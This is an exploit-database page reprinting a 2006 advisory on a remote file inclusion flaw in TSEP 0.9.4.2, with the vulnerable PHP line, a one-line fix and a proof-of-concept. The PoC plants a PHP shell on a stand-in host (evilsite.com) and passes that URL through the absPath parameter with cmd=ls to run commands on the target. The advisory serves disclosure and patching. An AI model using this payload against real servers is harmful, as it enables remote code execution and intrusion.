header-logo
Suggest Exploit
vendor:
TSEP
by:
Philipp Niedziela
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: TSEP
Affected Version From: 0.9.4.2
Affected Version To: 0.9.4.2
Patch Exists: YES
Related CWE: N/A
CPE: a:tsep:tsep
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

TSEP 0.9.4.2

The $tsep_config["absPath"] variable is not properly sanitized before being used, allowing an attacker to include a remote file containing malicious code. This can lead to remote file execution.

Mitigation:

Include config-File in copyright.php
Source

Exploit-DB raw data:

+--------------------------------------------------------------------
+
+ TSEP 0.9.4.2
+
+--------------------------------------------------------------------
+
+ Affected Software .: TSEP 0.9.4.2
+ Venedor ...........: http://www.tsep.info/
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+ Original advisory .: http://www.bb-pcsecurity.de/
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+
+--------------------------------------------------------------------
+
+ Code /include/copyright.php:
+
+ .....
+ <?php require ( $tsep_config["absPath"]."/include/tsepversion.txt" ); ?>
+ .....
+
+--------------------------------------------------------------------
+
+ $tsep_config["absPath"] is not properly sanitized before being used
+
+--------------------------------------------------------------------
+
+ Solution:
+ Include config-File in copyright.php
+
+--------------------------------------------------------------------
+
+ PoC:
+ Place a PHPShell on a remote location:
+ http://evilsite.com/include/tsepversion.txt
+
+ http://[target]/include/copyright.php?tsep_config[absPath]=http://evilsite.com?cmd=ls
+
+--------------------------------------------------------------------
+
+ Greets:
+ Krini Gonzales (5 YEARS :P)
+
+-------------------------[ E O F ]----------------------------------

# milw0rm.com [2006-08-01]

Navigation

Suggest Exploit

Services By CQR